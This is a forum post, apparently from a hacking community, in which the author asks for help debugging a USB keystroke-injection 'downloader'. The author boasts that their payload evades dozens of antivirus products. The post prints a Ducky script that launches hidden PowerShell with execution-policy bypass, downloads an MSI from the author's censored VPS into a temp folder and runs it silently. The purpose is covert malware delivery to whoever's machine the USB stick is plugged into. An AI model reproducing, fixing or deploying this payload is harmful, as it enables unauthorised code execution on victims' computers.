Jump to content

Payload Downloader Bug


Recommended Posts

I'm trying to make a Downloader so when I plug in the USB, it already downloads my hosted payload in some non-visible folder like %TEMP% and runs it. I've already managed to leave the FUD payload bypassing more than 79 anti virus including WD

- I'm trying with this payload below:

DELAY 1000
STRING powershell -NoP -NonI -W h -Exec Bypass md "$env:userprofile\temp"; iwr "http://---------------/Sistem2.msi" -outfile "$env:userprofile\temp\Sistem2.msi"; cd $env:userprofile\temp; sleep 5; & .\System2.msi

(I censored my VPS IP)

If I manually do what the payload says, which is to open Windows + R (run menu), write the STRING command and enter, it works! Download the silent file and run as I want. But when put as payload on DuckUSB, whether encrypted or not, it starts to open several times the CTRL + ALT + DEL and the Microsoft Office program (???)

I've already tried increasing the delay of actions among other things and I don't know what else to do

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
  • Create New...